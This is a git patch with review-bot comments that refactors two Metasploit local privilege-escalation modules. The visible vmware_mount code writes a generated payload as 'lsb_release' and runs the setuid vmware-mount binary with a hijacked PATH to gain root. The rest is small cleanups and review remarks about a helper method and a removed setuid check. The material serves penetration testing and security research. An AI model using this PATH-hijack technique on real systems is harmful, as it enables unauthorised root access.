From a3eee73efb45b162deb5d3dae7287cdfe718c60f Mon Sep 17 00:00:00 2001
From: h00die
Date: Sat, 8 Oct 2022 09:16:57 -0400
Subject: [PATCH] review comments
---
 .../local/nested_namespace_idmap_limit_priv_esc.rb | 2 +-
 modules/exploits/linux/local/vmware_mount.rb | 11 +++++------
 2 files changed, 6 insertions(+), 7 deletions(-)
diff --git a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
index ad2aa70d40..794a37d273 100644
--- a/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
+++ b/modules/exploits/linux/local/nested_namespace_idmap_limit_priv_esc.rb
@@ -124,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local
 end
 register_file_for_cleanup path
- chmod path, 0o755
+ chmod path, 0755
 end
 def strip_comments(c_code)
diff --git a/modules/exploits/linux/local/vmware_mount.rb b/modules/exploits/linux/local/vmware_mount.rb
index 36ec7a3292..f12cc621a7 100644
--- a/modules/exploits/linux/local/vmware_mount.rb
+++ b/modules/exploits/linux/local/vmware_mount.rb
@@ -63,8 +63,11 @@ class MetasploitModule < Msf::Exploit::Local
 ]
 end
+ def vmware_mount
+ '/usr/bin/vmware-mount'
+ end
+
 def check
- vmware_mount = '/usr/bin/vmware-mount'
 return CheckCode::Safe("#{vmware_mount} file not found") unless file? vmware_mount
 return CheckCode::Safe("#{vmware_mount} is not setuid") unless setuid? vmware_mount
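Review bot: In `vmware_mount.rb`, the new `vmware_mount` helper has no comment, although it is now the single place that fixes which binary `check` inspects and the following hunk invokes. A one-line comment above it would record that, for example `# Absolute path of the vmware-mount binary this module checks and invokes.` Because the value never varies, a frozen constant would state the same intent without building a new string on every call. The body of `check` continues past the end of this hunk.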
@@ -79,13 +82,9 @@ class MetasploitModule < Msf::Exploit::Local
 lsb_path = File.join(datastore['WritableDir'], 'lsb_release')
 write_file(lsb_path, generate_payload_exe)
 cmd_exec("chmod +x #{lsb_path}")
- cmd_exec("PATH=#{datastore['WritableDir']}:$PATH /usr/bin/vmware-mount")
+ cmd_exec("PATH=#{datastore['WritableDir']}:$PATH #{vmware_mount}")
 # Delete it here instead of using FileDropper because the original
 # session can clean it up
 cmd_exec("rm -f #{lsb_path}")
 end
-
- def setuid?(remote_file)
- !!(cmd_exec("test -u #{remote_file.strip} && echo true").index 'true')
- end
 end
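Review bot: Deleting the module's own `setuid?` at the end of the class leaves `check` calling a `setuid?` that must now come from elsewhere, presumably a framework file mixin that is not visible in this diff. It is worth confirming that the module includes that mixin and that it behaves the same for this path; the removed version ran `test -u` on the stripped argument and returned a strict boolean. If no such method is in scope, `check` would raise NoMethodError instead of returning a CheckCode. The method containing the `cmd_exec` lines starts before this hunk.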